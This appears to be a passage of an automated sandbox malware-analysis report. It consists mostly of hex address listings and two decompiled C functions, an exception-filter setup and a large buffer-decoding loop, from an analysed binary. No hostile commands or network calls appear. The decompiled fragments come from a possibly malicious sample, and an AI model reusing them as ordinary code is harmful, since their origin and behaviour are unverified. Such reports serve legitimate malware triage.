0x00e68913
0x00e6891a
0x00e6891c
0x00e6891c
0x00e6890f
0x00e688e8
0x00e688e2
0x00e6894e
0x00e68953
0x00e6896b
0x00e68976
0x00e6897e
0x00e68981
0x00e68983
0x00e68987
0x00e6898a
0x00e6898d
0x00e68990
0x00e689a8
0x00e689ab
0x00e689b0
0x00e689b6
0x00e689b7
0x00e689b9
0x00e689c2
0x00e689c2
0x00e689c4
0x00e689c7
0x00e689d1
0x00e689d8
0x00e689dd
0x00e689df
0x00e693ae
0x00e693ae
0x00e687f5
0x00e687f6
0x00e687fb
0x00e68805
0x00e68805
0x00e689e5
0x00e689f3
0x00e689f6
0x00e689fe
0x00e68a05
0x00e68a08
0x00e68a1f
0x00e68a1f
0x00e68a22
0x00e68a22
0x00e68a27
0x00e68a2a
0x00e68a31
0x00e68a32
0x00e68a35
0x00e68a38
0x00e68a43
0x00e68a43
0x00e68a46
0x00e68a4d
0x00e68a4d
0x00e68a53
0x00e68a5a
0x00e68a5b
0x00e68a69
0x00e68a6e
0x00e68a70
0x00e68aa8
0x00e68aab
0x00e68ab7
0x00e68ab7
0x00e68ab7
0x00e68aba
0x00e68aba
0x00e68ac4
0x00e68ac9
0x00e68acb
0x00e68aef
0x00e68aef
0x00e68af6
0x00000000
0x00000000
0x00e68af8
0x00e68b02
0x00e68b07
0x00e68b09
0x00e68beb
0x00000000
0x00e68beb
0x00e68b0f
0x00e68b12
0x00e68b1a
0x00e68b20
0x00e68b21
0x00e68b21
0x00e68b23
0x00e68b2c
0x00e68b2f
0x00e68b3b
0x00e68b4e
0x00e68b58
0x00e68b6a
0x00e68b6f
0x00e68b76
0x00e68c0f
0x00e68c0f
0x00e68c13
0x00e68c19
0x00e68c1e
0x00e68c24
0x00e68c29
0x00e68c2f
0x00e68c36
0x00e68c3b
0x00e68c3c
0x00e68c3e
0x00e68cd1
0x00e68cd3
0x00e68cd8
0x00e68cda
0x00e68d2c
0x00e68d2f
0x00e68d31
0x00e68d55
0x00e68d58
0x00e68d58
0x00e68d5f
0x00e68d97
0x00e68d99
0x00e69363
0x00e69363
0x00e69367
0x00e6936d
0x00e69372
0x00e69376
0x00e69379
0x00e6937c
0x00e6937e
0x00e6937e
0x00e6937e
0x00e6937e
0x00e69384
0x00e69384
0x00e69388
0x00000000
0x00000000
0x00e6938a
0x00e6938c
0x00e687f3
0x00e687f3
0x00000000
0x00e687f3
0x00e69392
0x00e69398
0x00e693a6
0x00e693a8
0x00000000
0x00000000
0x00000000
0x00e693a8
0x00e6939a
0x00e6939c
0x00000000
0x00e6939c
0x00e68d9f
0x00e68d9f
0x00e68da2
0x00e68da9
0x00e68dbb
0x00e68dbb
0x00e68dbe
0x00e68dc0
0x00e68e07
0x00e68e07
0x00e68e0b
0x00e68e0d
0x00e68e15
0x00e68e15
0x00e68e29
0x00e68e2f
0x00e68e35
0x00e68e3b
0x00e68e4c
0x00e68e62
0x00e68e6d
0x00e68e76
0x00e68e79
0x00e68e80
0x00e68e86
0x00e68e8b
0x00e68e8e
0x00e68e90
0x00e68e93
0x00e68e96
0x00e68e99
0x00e68e9c
0x00e68e9f
0x00e68ea1
0x00e68f44
0x00e68f44
0x00e68f47
0x00e68f4e
0x00e68f55
0x00e68f59
0x00e68f6f
0x00e68f71
0x00e68f71
0x00e68f72
0x00e68f72
0x00e68f76
0x00e68f79
0x00e68f7c
0x00e68f7f
0x00e6908e
0x00e69095
0x00e69097
0x00e6909e
0x00e690c8
0x00e690cd
0x00e690df
0x00e690e5
0x00e690e7
0x00e690ed
0x00e69107
0x00e690a0
0x00e690a0
0x00e690a6
0x00e690ac
0x00e690ad
0x00e690ad
0x00e6909e
0x00e6910c
0x00e6910e
0x00e69113
0x00e6911a
0x00e6914c
0x00e6914c
0x00e6914c
0x00e6914e
0x00e69150
0x00e69150
0x00e69157
0x00e69161
0x00e69168
0x00e69187
0x00e69187
0x00e6918b
0x00e6918e
0x00e691ef
0x00e691ef
0x00e691f3
0x00e691f6
0x00e69209
0x00e69209
0x00e69209
0x00e6920b
0x00e6920b
0x00e6920f
0x00000000
0x00000000
0x00e69215
0x00e69218
0x00e6921c
0x00e69228
0x00e69228
0x00e6922c
0x00e69247
0x00e69247
0x00e69249
0x00e6925e
0x00e6925e
0x00e69260
0x00e69324
0x00e69324
0x00e69327
0x00e6932e
0x00e69336
0x00e6933d
0x00e69342
0x00e69344
0x00e6934d
0x00e69357
0x00e69357
0x00e69344
0x00e6935c
0x00000000
0x00e6935c
0x00e69266
0x00e6926b
0x00e6926d
0x00e69270
0x00e69276
0x00e69276
0x00e69278
0x00e6928a
0x00e6928a
0x00e69290
0x00e69295
0x00e69298
0x00e6929e
0x00e692b2
0x00e692b9
0x00e692cc
0x00e692ce
0x00e692d7
0x00e692dc
0x00e692e2
0x00e692f1
0x00e69304
0x00e69317
0x00e69319
0x00e6931c
0x00e69321
0x00000000
0x00e69321
0x00e6927a
0x00e69280
0x00000000
0x00000000
0x00e69282
0x00e69288
0x00000000
0x00000000
0x00000000
0x00e69288
0x00e69272
0x00e69274
0x00000000
0x00000000
0x00000000
0x00e69274
0x00e6924b
0x00e6924e
0x00e69255
0x00000000
0x00000000
0x00e6925b
0x00000000
0x00e6925b
0x00e6922e
0x00e69230
0x00000000
0x00000000
0x00e69232
0x00e69239
0x00000000
0x00000000
0x00e6923f
0x00e69241
0x00000000
0x00000000
0x00000000
0x00e69241
0x00e6921e
0x00e69222
0x00000000
0x00000000
0x00000000
0x00e69222
0x00e691f8
0x00e691ff
0x00000000
0x00000000
0x00e69201
0x00e69203
0x00000000
0x00000000
0x00e69205
0x00000000
0x00e69205
0x00e69190
0x00e69194
0x00000000
0x00000000
0x00e69196
0x00e69198
0x00000000
0x00000000
0x00e6919a
0x00e691a0
0x00e691ca
0x00e691ca
0x00e691d4
0x00e691d5
0x00e691d7
0x00e691d7
0x00e691e3
0x00e691e7
0x00e691ec
0x00000000
0x00e691ec
0x00e691a2
0x00e691a8
0x00e691b2
0x00e691b2
0x00e691b9
0x00000000
0x00000000
0x00e691bb
0x00e691c5
0x00e691c6
0x00000000
0x00e691c6
0x00e691aa
0x00e691b0
0x00000000
0x00000000
0x00000000
0x00e691b0
0x00e6916a
0x00e69170
0x00000000
0x00000000
0x00e69172
0x00e6917c
0x00e6917c
0x00e6917e
0x00e69180
0x00e69180
0x00000000
0x00e6917e
0x00e69174
0x00e6917a
0x00000000
0x00000000
0x00000000
0x00e6917a
0x00e69159
0x00000000
0x00e69159
0x00e69131
0x00e6913d
0x00e69142
0x00e69144
0x00000000
0x00000000
0x00e69146
0x00e69148
0x00000000
0x00e69148
0x00e68f85
0x00e68f8b
0x00e68f8e
0x00e68ff7
0x00e68ff7
0x00e68ffc
0x00e6900d
0x00e69012
0x00e69015
0x00e69017
0x00e69067
0x00e69067
0x00e6906a
0x00e6906a
0x00e69071
0x00e68fc3
0x00e68fc3
0x00e68fc5
0x00e69084
0x00e69084
0x00e69084
0x00e69086
0x00e69086
0x00000000
0x00e69086
0x00e68fcb
0x00e68fcb
0x00e68fcd
0x00000000
0x00000000
0x00e68fd5
0x00000000
0x00e68fd5
0x00e69077
0x00e69079
0x00000000
0x00000000
0x00e68fbf
0x00e68fbf
0x00000000
0x00e68fbf
0x00e69019
0x00e69021
0x00000000
0x00000000
0x00e69023
0x00e69029
0x00e69035
0x00e69036
0x00e69039
0x00e6904a
0x00e6904b
0x00e69052
0x00e6903b
0x00e6903b
0x00e6903e
0x00e6903e
0x00e69057
0x00e69057
0x00e6905a
0x00e6905c
0x00e68fbc
0x00e68fbc
0x00000000
0x00e68fbc
0x00e69062
0x00000000
0x00e69062
0x00e68f90
0x00e68f93
0x00000000
0x00000000
0x00e68f95
0x00e68f97
0x00e68fdb
0x00e68fdb
0x00e68fdd
0x00000000
0x00000000
0x00e68fe9
0x00e68ff0
0x00000000
0x00e68ff0
0x00e68f99
0x00e68f9c
0x00000000
0x00000000
0x00e68f9e
0x00e68fa1
0x00000000
0x00000000
0x00e68fb0
0x00e68fb5
0x00e68fb7
0x00e68fb9
0x00000000
0x00e68fb9
0x00e68f5b
0x00e68f5d
0x00000000
0x00000000
0x00e68f61
0x00e68f62
0x00e68f66
0x00000000
0x00000000
0x00e68f6a
0x00e68f6b
0x00000000
0x00e68f6b
0x00e68ea7
0x00e68ead
0x00000000
0x00000000
0x00e68eb3
0x00e68eb9
0x00e68ebf
0x00e68ec1
0x00e68f41
0x00e68f41
0x00000000
0x00e68f41
0x00e68ec3
0x00e68ecd
0x00e68ecd
0x00e68edd
0x00e68ee0
0x00e68ee2
0x00e68f3c
0x00e68f3c
0x00e68f3f
0x00e68f3f
0x00000000
0x00e68f3f
0x00e68ee4
0x00e68eea
0x00e68eec
0x00e68eee
0x00e68f13
0x00e68f19
0x00e68f25
0x00e68f30
0x00e68f39
0x00000000
0x00e68f39
0x00e68ef0
0x00e68efa
0x00e68efc
0x00e68f01
0x00e68f07
0x00000000
0x00000000
0x00e68f09
0x00000000
0x00000000
0x00e68f0b
0x00e68f11
0x00000000
0x00000000
0x00000000
0x00e68f11
0x00e68ef2
0x00e68ef8
0x00000000
0x00000000
0x00000000
0x00e68ef8
0x00e68ee6
0x00e68ee8
0x00000000
0x00000000
0x00000000
0x00e68ee8
0x00e68ec5
0x00e68ecb
0x00000000
0x00000000
0x00000000
0x00e68ecb
0x00e68e0f
0x00e68e0f
0x00e68e0f
0x00e68e0f
0x00000000
0x00e68e0f
0x00e68dc6
0x00e68dc9
0x00e68dca
0x00e68dcd
0x00e68dcf
0x00e68dda
0x00e68ddc
0x00e68deb
0x00e68dfd
0x00e68dfd
0x00e68ddc
0x00000000
0x00e68dcd
0x00e68dab
0x00e68db2
0x00e68db9
0x00e68e04
0x00000000
0x00e68e04
0x00000000
0x00e68db9
0x00e68d65
0x00e68d68
0x00e68d6f
0x00e68d76
0x00e68d7b
0x00e68d7d
0x00000000
0x00000000
0x00e68d7f
0x00e68d81
0x00e68d84
0x00e68d84
0x00e68d8a
0x00e68d8f
0x00000000
0x00e68d8f
0x00e68d33
0x00e68d3c
0x00e68d3d
0x00e68d42
0x00e68d45
0x00e68d47
0x00e68d4f
0x00e68d4f
0x00e68d51
0x00000000
0x00000000
0x00000000
0x00e68d53
0x00e68cdc
0x00e68ce0
0x00e68ce6
0x00e68ce9
0x00e68ced
0x00e68cf5
0x00e68cf6
0x00e68cf9
0x00e68d01
0x00e68d02
0x00e68d05
0x00e68d07
0x00e68d0d
0x00e68d13
0x00e68d15
0x00e68d1b
0x00e68d25
0x00e68d25
0x00e68d13
0x00e68d05
0x00e68cf9
0x00e68ced
0x00000000
0x00e68ce0
0x00e68c44
0x00e68c47
0x00000000
0x00000000
0x00e68c4d
0x00e68c50
0x00e68c53
0x00e68c55
0x00000000
0x00000000
0x00e68c5b
0x00e68c5e
0x00000000
0x00000000
0x00e68c64
0x00e68c67
0x00e68c6e
0x00000000
0x00000000
0x00e68c76
0x00e68c80
0x00e68c85
0x00e68c87
0x00e68cbe
0x00e68cbe
0x00e68cc2
0x00e68d4c
0x00000000
0x00e68d4c
0x00e68cc8
0x00e68cca
0x00e68ccc
0x00000000
0x00e68ccc
0x00e68c89
0x00e68c8d
0x00000000
0x00000000
0x00e68c8f
0x00e68c97
0x00e68c98
0x00e68c9f
0x00e68cb9
0x00000000
0x00e68cb9
0x00e68b7c
0x00e68b83
0x00000000
0x00000000
0x00e68b8b
0x00e68b96
0x00e68b9b
0x00e68b9e
0x00e68ba0
0x00000000
0x00000000
0x00e68ba2
0x00e68ba9
0x00000000
0x00000000
0x00e68bab
0x00e68bb2
0x00e68bbc
0x00e68bbd
0x00e68bf7
0x00e68bf9
0x00e68c05
0x00e68c0a
0x00e68c0c
0x00000000
0x00e68c0c
0x00e68bbf
0x00e68bc4
0x00e68bd2
0x00e68bd7
0x00e68bdb
0x00e68be1
0x00e68be1
0x00e68aef
0x00e68ad4
0x00e68adb
0x00e68ae0
0x00e68ae7
0x00000000
0x00e68ae7
0x00e68a79
0x00e68a7f
0x00e68a84
0x00e68a86
0x00000000
0x00000000
0x00e68a88
0x00e68a8f
0x00e68aa1
0x00e68aa3
0x00000000
0x00e68aa3
0x00e68a92
0x00e68a98
0x00e68a9d
0x00e68a9f
0x00000000
0x00000000
0x00000000
0x00e68a9f
0x00e68a48
0x00e68a4b
0x00000000
0x00000000
0x00000000
0x00e68a4b
0x00e68a3a
0x00e68a41
0x00000000
0x00000000
0x00000000
0x00e68a41
0x00e68a0a
0x00e68a11
0x00000000
0x00000000
0x00e68a13
0x00e68a17
0x00e68a1d
0x00000000
0x00000000
0x00000000
0x00e68a1d
0x00e689bb
0x00e689be
0x00e689c0
0x00000000
0x00000000
0x00000000
0x00e689c0
0x00e68992
0x00e68998
0x00e6899b
0x00e6899e
0x00e689a0
0x00000000
0x00e689a6
0x00e689a6
0x00e689a6
0x00000000
0x00e689a6
0x00e689a0
0x00e6885b
0x00e68861
0x00000000
0x00000000
0x00e68863
0x00e6886a
0x00000000
0x00000000
0x00000000
0x00e6886a
0x00e68834
0x00e6883e
0x00e6883e
0x00e68844
0x00000000
0x00e68844
0x00e68836
0x00e6883c
0x00000000
0x00000000
0x00000000
0x00e6883c
0x00e68816
0x00e68820
0x00e68820
0x00e68826
0x00000000
0x00e68826
0x00e68818
0x00e6881e
0x00000000
0x00000000
0x00000000
0x00e6881e
0x00e68775
0x00e68778
0x00e68797
0x00e68797
0x00e6879a
0x00000000
0x00000000
0x00e687a0
0x00e687a7
0x00000000
0x00000000
0x00e687b2
0x00e687b3
0x00e687b7
0x00e687b8
0x00e687b9
0x00e687be
0x00e687c0
0x00e687d5
0x00e687e9
0x00e687f1
0x00000000
0x00e687c2
0x00e687c9
0x00000000
0x00e687c9
0x00e687c0
0x00e6877a
0x00e68781
0x00000000
0x00e68787
0x00e68792
0x00000000
0x00e68792
0x00e68781
0x00e6873e
0x00e6875c
0x00e6875c
0x00000000
0x00e6875c
0x00e68740
0x00e68741
0x00e68745
0x00e68746
0x00e6874e
0x00e68763
0x00e68763
0x00000000
0x00e68750
0x00e68757
0x00000000
0x00e68757

APIs

__EH_prolog.LIBCMT ref: 00E6870E
_memcmp.LIBVCRUNTIME ref: 00E68B96

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: H_prolog_memcmp
String ID:
API String ID: 3004599000-0
Opcode ID: fa7802e570b602995c81d138b10eacd447efcbd4b56a58a67334850debe068ce
Instruction ID: a9ad7739e0352bab2e86c1378144a6cd82cd81293543d5ad91615a348aa46b76
Opcode Fuzzy Hash: fa7802e570b602995c81d138b10eacd447efcbd4b56a58a67334850debe068ce
Instruction Fuzzy Hash: B1822B30944285AEDF25DF60D985BFABBBDAF05384F0861BAD849BB183DB315E44C760

Uniqueness

Uniqueness Score: -1.00%

Function 00E7F303 Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E7F303() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00E7F310); // executed
				return _t1;
			}

0x00e7f308
0x00e7f30e

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_0001F310,00E7ED75), ref: 00E7F308

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: b4d1655834ea89dcf78ec1883b76fb2ec81bb2101cb8cf16791a023832e783fb
Instruction ID: 635feea56c333eef36ea99cb47f114a7be6c9c1aef8c4130939b52809469d4a5
Opcode Fuzzy Hash: b4d1655834ea89dcf78ec1883b76fb2ec81bb2101cb8cf16791a023832e783fb
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00E76887 Relevance: .3, Instructions: 325
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E00E76887(signed int __ecx, void* __edx, void* __eflags) {
				void* __ebp;
				signed int _t161;
				intOrPtr _t164;
				signed int _t170;
				signed int _t171;
				signed int _t175;
				signed int _t178;
				void* _t181;
				void* _t188;
				signed int _t193;
				signed int _t194;
				signed int _t195;
				signed int _t197;
				signed int _t208;
				signed int _t212;
				intOrPtr _t213;
				signed int _t216;
				signed int _t219;
				signed int _t223;
				signed int _t225;
				signed int _t226;
				intOrPtr* _t232;
				void* _t238;
				signed int _t240;
				signed int _t241;
				intOrPtr _t245;
				intOrPtr _t247;
				signed int _t257;
				intOrPtr* _t259;
				signed int _t260;
				signed int _t263;
				intOrPtr* _t267;
				intOrPtr _t268;
				void* _t269;
				signed int _t270;
				void* _t272;
				signed int _t273;
				void* _t274;
				void* _t276;

				_t216 = __ecx; // executed
				E00E730C9(__ecx, __edx); // executed
				E00E748F2(__ecx,  *((intOrPtr*)(_t274 + 0x238)));
				_t240 = 0;
				if( *(_t216 + 0x1c) +  *(_t216 + 0x1c) != 0) {
					_t238 = 0;
					do {
						_t213 =  *((intOrPtr*)(_t216 + 0x18));
						_t238 = _t238 + 0x4ae4;
						_t240 = _t240 + 1;
						 *((char*)(_t213 + _t238 - 0x13)) = 0;
						 *((char*)(_t213 + _t238 - 0x11)) = 0;
					} while (_t240 <  *(_t216 + 0x1c) +  *(_t216 + 0x1c));
				}
				_t219 = 5;
				memcpy( *((intOrPtr*)(_t216 + 0x18)) + 0x18, _t216 + 0x8c, _t219 << 2);
				E00E7F750( *((intOrPtr*)(_t216 + 0x18)) + 0x30, _t216 + 0xa0, 0x4a9c);
				_t276 = _t274 + 0x18;
				_t263 = 0;
				 *(_t276 + 0x28) = 0;
				_t268 = 0;
				 *((char*)(_t276 + 0x13)) = 0;
				 *((intOrPtr*)(_t276 + 0x18)) = 0;
				 *((char*)(_t276 + 0x12)) = 0;
				while(1) {
					L4:
					_t161 = E00E6CC70( *_t216,  *((intOrPtr*)(_t216 + 0x20)) + _t263, 0x00400000 - _t263 & 0xfffffff0);
					 *(_t276 + 0x2c) = _t161;
					if(_t161 < 0) {
						break;
					}
					_t263 = _t263 + _t161;
					 *(_t276 + 0x20) = _t263;
					if(_t263 != 0) {
						if(_t161 <= 0) {
							goto L56;
						} else {
							if(_t263 >= 0x400) {
								L56:
								while(_t268 < _t263) {
									_t225 = 0;
									 *(_t276 + 0x14) =  *(_t276 + 0x14) & 0;
									 *(_t276 + 0x1c) = 0;
									_t170 =  *(_t216 + 0x1c) +  *(_t216 + 0x1c);
									__eflags = _t170;
									if(_t170 != 0) {
										_t245 =  *((intOrPtr*)(_t276 + 0x18));
										_t273 = 0;
										__eflags = 0;
										do {
											_t259 =  *((intOrPtr*)(_t216 + 0x18)) + _t273;
											 *(_t276 + 0x28) = _t225;
											__eflags =  *((char*)(_t259 + 0x4ad3));
											 *_t259 = _t216;
											if( *((char*)(_t259 + 0x4ad3)) == 0) {
												E00E6A9B0(_t259 + 4,  *((intOrPtr*)(_t216 + 0x20)) + _t245);
												_t263 =  *(_t276 + 0x20);
												 *((intOrPtr*)(_t259 + 8)) = 0;
												_t170 = _t263 -  *((intOrPtr*)(_t276 + 0x18));
												__eflags = _t170;
												 *((intOrPtr*)(_t259 + 4)) = 0;
												 *(_t259 + 0x4acc) = _t170;
												if(_t170 != 0) {
													 *((char*)(_t259 + 0x4ad0)) = 0;
													 *((char*)(_t259 + 0x14)) = 0;
													 *((char*)(_t259 + 0x2c)) = 0;
													_t225 =  *(_t276 + 0x1c);
													goto L15;
												}
											} else {
												 *(_t259 + 0x4acc) = _t263;
												L15:
												__eflags =  *(_t276 + 0x2c);
												 *((char*)(_t259 + 0x4ad3)) = 0;
												 *(_t259 + 0x4ae0) = _t225;
												__eflags =  *((char*)(_t259 + 0x14));
												 *((char*)(_t259 + 0x4ad2)) = _t170 & 0xffffff00 |  *(_t276 + 0x2c) == 0x00000000;
												if( *((char*)(_t259 + 0x14)) != 0) {
													L20:
													__eflags =  *((char*)(_t276 + 0x13));
													if( *((char*)(_t276 + 0x13)) != 0) {
														L23:
														 *((char*)(_t259 + 0x4ad1)) = 1;
														 *((char*)(_t276 + 0x13)) = 1;
													} else {
														__eflags =  *((intOrPtr*)(_t259 + 0x18)) - 0x20000;
														if( *((intOrPtr*)(_t259 + 0x18)) > 0x20000) {
															goto L23;
														} else {
															 *(_t276 + 0x14) =  *(_t276 + 0x14) + 1;
														}
													}
													_t273 = _t273 + 0x4ae4;
													_t245 =  *((intOrPtr*)(_t276 + 0x18)) +  *((intOrPtr*)(_t259 + 0x24)) +  *((intOrPtr*)(_t259 + 0x18));
													_t225 = _t225 + 1;
													 *((intOrPtr*)(_t276 + 0x18)) = _t245;
													_t208 = _t263 - _t245;
													__eflags = _t208;
													 *(_t276 + 0x1c) = _t225;
													if(_t208 < 0) {
														L26:
														__eflags = _t208 - 0x400;
														if(_t208 >= 0x400) {
															goto L27;
														}
													} else {
														__eflags =  *((char*)(_t259 + 0x28));
														if( *((char*)(_t259 + 0x28)) == 0) {
															goto L26;
														}
													}
												} else {
													 *((char*)(_t259 + 0x14)) = 1;
													_push(_t259 + 0x18);
													_push(_t259 + 4);
													_t212 = E00E73A02(_t216);
													__eflags = _t212;
													if(_t212 == 0) {
														L29:
														 *((char*)(_t276 + 0x12)) = 1;
													} else {
														__eflags =  *((char*)(_t259 + 0x29));
														if( *((char*)(_t259 + 0x29)) != 0) {
															L19:
															_t225 =  *(_t276 + 0x1c);
															 *((char*)(_t216 + 0xe662)) = 1;
															goto L20;
														} else {
															__eflags =  *((char*)(_t216 + 0xe662));
															if( *((char*)(_t216 + 0xe662)) == 0) {
																goto L29;
															} else {
																goto L19;
															}
														}
													}
												}
											}
											goto L30;
											L27:
											_t170 =  *(_t216 + 0x1c) +  *(_t216 + 0x1c);
											__eflags = _t225 - _t170;
										} while (_t225 < _t170);
									}
									L30:
									_t226 =  *(_t276 + 0x14);
									_t171 = _t226;
									_t257 = _t171 /  *(_t216 + 0x1c);
									__eflags = _t171 %  *(_t216 + 0x1c);
									if(_t171 %  *(_t216 + 0x1c) != 0) {
										_t257 = _t257 + 1;
										__eflags = _t257;
									}
									_t269 = 0;
									__eflags = _t226;
									if(_t226 != 0) {
										_t247 = 0;
										_t267 = _t276 + 0x34;
										_t195 = _t257 * 0x4ae4;
										__eflags = _t195;
										 *((intOrPtr*)(_t276 + 0x24)) = 0;
										 *(_t276 + 0x30) = _t195;
										do {
											_t232 = _t267;
											_t248 = _t247 +  *((intOrPtr*)(_t216 + 0x18));
											_t197 =  *(_t276 + 0x14) - _t269;
											_t267 = _t267 + 8;
											 *_t232 = _t247 +  *((intOrPtr*)(_t216 + 0x18));
											__eflags = _t257 - _t197;
											if(_t257 < _t197) {
												_t197 = _t257;
											}
											__eflags =  *(_t276 + 0x1c) - 1;
											 *(_t232 + 4) = _t197;
											if( *(_t276 + 0x1c) != 1) {
												E00E70ACC( *((intOrPtr*)(_t216 + 0x14)), E00E772D0, _t232);
											} else {
												E00E76CBC(_t216, _t248);
											}
											_t269 = _t269 + _t257;
											_t247 =  *((intOrPtr*)(_t276 + 0x24)) +  *(_t276 + 0x30);
											 *((intOrPtr*)(_t276 + 0x24)) = _t247;
											__eflags = _t269 -  *(_t276 + 0x14);
										} while (_t269 <  *(_t276 + 0x14));
										_t263 =  *(_t276 + 0x20);
									}
									_t270 =  *(_t276 + 0x1c);
									__eflags = _t270;
									if(_t270 == 0) {
										_t268 =  *((intOrPtr*)(_t276 + 0x18));
										goto L68;
									} else {
										E00E70D11( *((intOrPtr*)(_t216 + 0x14)));
										 *(_t276 + 0x14) = 0;
										__eflags = _t270;
										if(_t270 == 0) {
											L52:
											_t175 =  *((intOrPtr*)(_t276 + 0x12));
											goto L53;
										} else {
											_t260 = 0;
											__eflags = 0;
											do {
												_t272 =  *((intOrPtr*)(_t216 + 0x18)) + _t260;
												__eflags =  *((char*)(_t272 + 0x4ad1));
												if( *((char*)(_t272 + 0x4ad1)) != 0) {
													L47:
													_t178 = E00E772FF(_t216, _t272);
													__eflags = _t178;
													if(_t178 != 0) {
														goto L48;
													}
												} else {
													_t194 = E00E73476(_t216, _t272);
													__eflags = _t194;
													if(_t194 != 0) {
														__eflags =  *((char*)(_t272 + 0x4ad1));
														if( *((char*)(_t272 + 0x4ad1)) == 0) {
															L48:
															__eflags =  *((char*)(_t272 + 0x4ad0));
															if( *((char*)(_t272 + 0x4ad0)) == 0) {
																__eflags =  *((char*)(_t272 + 0x4ad3));
																if( *((char*)(_t272 + 0x4ad3)) != 0) {
																	_t230 =  *((intOrPtr*)(_t216 + 0x20));
																	_t181 =  *((intOrPtr*)(_t272 + 0x10)) -  *((intOrPtr*)(_t216 + 0x20)) +  *(_t272 + 4);
																	__eflags = _t263 - _t181;
																	if(_t263 > _t181) {
																		_t263 = _t263 - _t181;
																		 *(_t276 + 0x2c) = _t263;
																		E00E81B10(_t230, _t181 + _t230, _t263);
																		_t276 = _t276 + 0xc;
																		 *((intOrPtr*)(_t272 + 0x18)) =  *((intOrPtr*)(_t272 + 0x18)) +  *(_t272 + 0x20) -  *(_t272 + 4);
																		 *(_t272 + 0x24) =  *(_t272 + 0x24) & 0x00000000;
																		 *(_t272 + 0x20) =  *(_t272 + 0x20) & 0x00000000;
																		 *(_t272 + 4) =  *(_t272 + 4) & 0x00000000;
																		 *((intOrPtr*)(_t272 + 0x10)) =  *((intOrPtr*)(_t216 + 0x20));
																		__eflags =  *(_t276 + 0x14);
																		if( *(_t276 + 0x14) != 0) {
																			_t188 =  *((intOrPtr*)(_t216 + 0x18));
																			E00E7F750(_t188, _t272, 0x4ae4);
																			 *((intOrPtr*)( *((intOrPtr*)(_t216 + 0x18)) + 0x4ad4)) =  *((intOrPtr*)(_t188 + 0x4ad4));
																			_t263 =  *(_t276 + 0x2c);
																			 *((intOrPtr*)( *((intOrPtr*)(_t216 + 0x18)) + 0x4adc)) =  *((intOrPtr*)(_t188 + 0x4adc));
																			 *((char*)(_t272 + 0x4ad3)) = 0;
																			goto L62;
																		}
																		goto L63;
																	}
																} else {
																	__eflags =  *((char*)(_t272 + 0x28));
																	if( *((char*)(_t272 + 0x28)) != 0) {
																		_t175 = 1;
																		 *((char*)(_t276 + 0x12)) = 1;
																		L53:
																		__eflags = _t175;
																		if(_t175 == 0) {
																			_t268 =  *((intOrPtr*)(_t276 + 0x18));
																			_t263 = _t263 - _t268;
																			__eflags = _t263 - 0x400;
																			if(_t263 < 0x400) {
																				__eflags = _t263;
																				if(__eflags >= 0) {
																					if(__eflags <= 0) {
																						L63:
																						_t268 = 0;
																						 *((intOrPtr*)(_t276 + 0x18)) = 0;
																						L68:
																						__eflags =  *((char*)(_t276 + 0x12));
																						if( *((char*)(_t276 + 0x12)) == 0) {
																							goto L4;
																						}
																					} else {
																						E00E81B10( *((intOrPtr*)(_t216 + 0x20)),  *((intOrPtr*)(_t216 + 0x20)) + _t268, _t263);
																						L62:
																						_t276 = _t276 + 0xc;
																						goto L63;
																					}
																				}
																			} else {
																				_t263 =  *(_t276 + 0x20);
																				goto L56;
																			}
																		}
																	} else {
																		goto L51;
																	}
																}
															}
														} else {
															goto L47;
														}
													}
												}
												goto L69;
												L51:
												_t260 = _t260 + 0x4ae4;
												_t193 =  *(_t276 + 0x14) + 1;
												 *(_t276 + 0x14) = _t193;
												__eflags = _t193 -  *(_t276 + 0x1c);
											} while (_t193 <  *(_t276 + 0x1c));
											goto L52;
										}
									}
									goto L69;
								}
							}
							continue;
						}
					}
					break;
				}
				L69:
				 *(_t216 + 0x7c) =  *(_t216 + 0x7c) &  *(_t216 + 0xe6dc);
				E00E74DF4(_t216);
				_t241 =  *(_t276 + 0x28) * 0x4ae4;
				_t164 =  *((intOrPtr*)(_t216 + 0x18));
				_t223 = 5;
				__eflags = _t164 + _t241 + 0x30;
				return E00E7F750(memcpy(_t216 + 0x8c, _t241 + 0x18 + _t164, _t223 << 2), _t164 + _t241 + 0x30, 0x4a9c);
			}

0x00e76891
0x00e76893
0x00e768a1
0x00e768a9
0x00e768ad
0x00e768af
0x00e768b1
0x00e768b1
0x00e768b4
0x00e768ba
0x00e768bb
0x00e768c0
0x00e768ca
0x00e768b1
0x00e768d9
0x00e768e9
0x00e768f2
0x00e768f9
0x00e768fc
0x00e768fe
